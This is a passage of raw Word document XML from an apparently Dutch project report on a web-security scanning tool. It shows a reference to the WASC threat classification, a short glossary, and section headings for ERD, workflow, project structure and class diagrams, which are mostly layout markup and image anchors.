      <w:r w:rsidRPr="00CC5BFC">
        <w:t>WASC (2011). Threat Classification. Geraadpleegd van</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF0FA07" w14:textId="0EFE38C9" w:rsidR="00886D84" w:rsidRPr="00CC5BFC" w:rsidRDefault="00315FD7" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://projects.webappsec.org/w/page/13246978/Threat%20Classification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15D423A6" w14:textId="77777777" w:rsidR="00CC5BFC" w:rsidRDefault="00CC5BFC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1769B4EE" w14:textId="0D82562A" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="61" w:name="_Toc496292470"/>
    <w:p w14:paraId="1B2EC317" w14:textId="33BC0D1C"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A179F"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bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="3410B13D" w14:textId="26FB97F8" w:rsidR="00F57BDD" w:rsidRDefault="00EF688B" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc496292471"/>
      <w:r>
        <w:t>Glossary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>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56FAC497" w14:textId="67B4D0B6" w:rsidR="008C097F" w:rsidRPr="008C097F" w:rsidRDefault="00AB602D" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CRUD</w:t>
      </w:r>
      <w:r w:rsidR="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA" w:rsidRPr="001C3ECA">
        <w:t>CRUD staat voor Create, Read, Update, Delete</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t>. Dit zijn de database evenementen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022B596" w14:textId="77777777" w:rsidR="00550021" w:rsidRPr="00550021" w:rsidRDefault="008C097F" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C097F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="001C3ECA">
        <w:t xml:space="preserve"> ORM staat voor Object Relation Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C05C7" w14:textId="4445E7AA" w:rsidR="00F241F6" w:rsidRPr="00550021" w:rsidRDefault="00550021" w:rsidP="00550021">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ERD</w:t>
      </w:r>
      <w:r w:rsidRPr="00550021">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>ERD staat voor Entity Relationship Diagram</w:t>
      </w:r>
      <w:r w:rsidR="00F241F6">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A55C0"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2D0A936D" w:rsidR="00487AE4" w:rsidRPr="002E2EF6" w:rsidRDefault="000876DB" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc496292472"/>
      <w:r w:rsidRPr="002E2EF6">
        <w:rPr>
          <w:noProof/>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40">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t>ERD MODEL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidR="00487AE4" w:rsidRPr="002E2EF6">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="64" w:name="_Toc496292473"/>
    <w:p w14:paraId="2AFD6E81" w14:textId="29F54E68" w:rsidR="00487AE4" w:rsidRPr="00537717" w:rsidRDefault="007460D6" w:rsidP="003527DB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">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67BF1D7D">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45E8C"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537717" w:rsidRPr="00537717">
        <w:t>Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="31AA425D" w14:textId="6A742BD6" w:rsidR="00487AE4" w:rsidRDefault="00487AE4" w:rsidP="00F241F6"/>
    <w:p w14:paraId="6BC0B2B0" w14:textId="05C2A050" w:rsidR="00487AE4" w:rsidRDefault="00A65BD3" w:rsidP="00F241F6">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253257728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2ECE3746" wp14:editId="1A5977D1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-520065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7092950" cy="536638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41">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7092950" cy="5366385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3770ADD3" w14:textId="77777777" w:rsidR="00143F12" w:rsidRDefault="00143F12">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C94ECA" w14:textId="400027E1" w:rsidR="00143F12" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc496292476"/>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253308928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6106C1F8" wp14:editId="6C48C188">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-895211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-896620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="832" name="Rectangle 8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1241A" id="Rectangle 832" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.5pt;margin-top:-70.55pt;width:25pt;height:1031.7pt;z-index:-2500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xP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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="008D40E9">
        <w:t>Projectstructuur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="5DE0A519" w14:textId="77777777" w:rsidR="00143F12" w:rsidRPr="008D40E9" w:rsidRDefault="00143F12" w:rsidP="00143F12">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253306880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E2AAAE5" wp14:editId="15EABB81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5878195</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1933575" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="0" b="1016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Mail.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1933575" cy="95504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5856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6928130F" wp14:editId="4170266D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4561205</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2442845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1917700" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1270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Model.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId143">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1917700" cy="336550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3808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="067F06BB" wp14:editId="5231F352">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2211070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3818255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2157730" cy="2291080"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>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DAL.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId144">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2157730" cy="229108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n-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253302784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61508440" wp14:editId="68EE87EE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2207895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2165350" cy="3715385"/>
            <wp:effectExtent l="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Console en Core.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2165350" cy="371538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4832" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E198E5" wp14:editId="66B33E17">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4498340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>53975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2020570" cy="2277110"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8890"/>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Services.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2020570" cy="227711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inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0561DB57" wp14:editId="16284A10">
            <wp:extent cx="2083261" cy="6602026"/>
            <wp:effectExtent l="0" t="0" r="0" b="25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rojectstructuur.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId147">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2143271" cy="6792204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491998C" w14:textId="64FC2051" w:rsidR="00A52CC1" w:rsidRDefault="00A52CC1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="66" w:name="_Toc496292474"/>
    <w:bookmarkStart w:id="67" w:name="_Toc495181361"/>
    <w:p w14:paraId="0110FB3B" w14:textId="77777777" w:rsidR="00180059" w:rsidRDefault="000242C2" w:rsidP="000E3238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253284352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C4E319F" wp14:editId="10C54379">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-901239</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1013634</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="855" name="Rectangle 85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53D92" id="Rectangle 855" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.95pt;margin-top:-79.75pt;width:25pt;height:1031.7pt;z-index:-2500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XJICAACxBQAADgAAAGRycy9lMm9Eb2MueG1srFRRT9swEH6ftP9g+X0kKXS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pyWSz1FVHVfl5P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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00120DEF">
        <w:t>Klasse</w:t>
      </w:r>
      <w:r w:rsidR="00180059">
        <w:t>n Diagrammen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="28283D15" w14:textId="1A66F3ED" w:rsidR="00C41B3D" w:rsidRPr="007C4285" w:rsidRDefault="00C41B3D" w:rsidP="00DE58B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B62243" w14:textId="26D6C272" w:rsidR="00AB6653" w:rsidRPr="00DE58B9" w:rsidRDefault="001E691D" w:rsidP="00DE58B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253296640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A493318" wp14:editId="1B06F536">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6412865" cy="5829300"/>
                <wp:effectExtent l="0" t="0" r="13335" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21647"/>
                    <wp:lineTo x="21559" y="21647"/>
                    <wp:lineTo x="21559" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="864" name="Rectangle 864"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6412865" cy="5829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F77F4" id="Rectangle 864" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:17.75pt;width:504.95pt;height:459pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001E7E3E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253299712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="019DC5AA" wp14:editId="64D83F54">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6050280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2031365" cy="1600200"/>
                <wp:effectExtent l="0" t="0" r="26035" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21607" y="21600"/>
                    <wp:lineTo x="21607" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="867" name="Rectangle 867"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="20313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EDEF8" id="Rectangle 867" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:476.4pt;width:159.95pt;height:126pt;z-index:2532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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F36877">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253297664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="639AFC92" wp14:editId="17EE479D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4244340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>569595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1651000" cy="800100"/>
                <wp:effectExtent l="0" t="0" r="25400" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="865" name="Text Box 865"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="16510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014D74" w14:textId="29AD1193" w:rsidR="00F36877" w:rsidRPr="00F36877" w:rsidRDefault="00211091" w:rsidP="00F36877">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="36"/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>De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AFC92" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 865" o:spid="_x0000_s1262" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:334.2pt;margin-top:44.85pt;width:130pt;height:63pt;z-index:2532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" filled="f" strokecolor="#4472c4 [3204]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="44014D74" w14:textId="29AD1193" w:rsidR="00F36877" w:rsidRPr="00F36877" w:rsidRDefault="00211091" w:rsidP="00F36877">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="36"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Deel A</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AB6653">
        <w:t xml:space="preserve">Klasse Diagram van de Scan Modules. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCB501" w14:textId="1B92E696" w:rsidR="009E2309" w:rsidRDefault="00F36877">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668452" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14032C27" wp14:editId="5A2B08DA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-4445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760720" cy="7198995"/>
            <wp:effectExtent l="0" t="0" r="5080"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Klasse diagram Deel A.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId148">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="7198995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6D22C" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="2149B83B" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="242D6589" w14:textId="77777777" w:rsidR="00F36877" w:rsidRDefault="00F36877"/>
    <w:p w14:paraId="414C6E89" w14:textId="389DAD03" w:rsidR="000F3896" w:rsidRDefault="00F36877">
      <w:r w:rsidRPr="00537717">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253295616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="22713D78" wp14:editId="0F07C859">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-899525</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
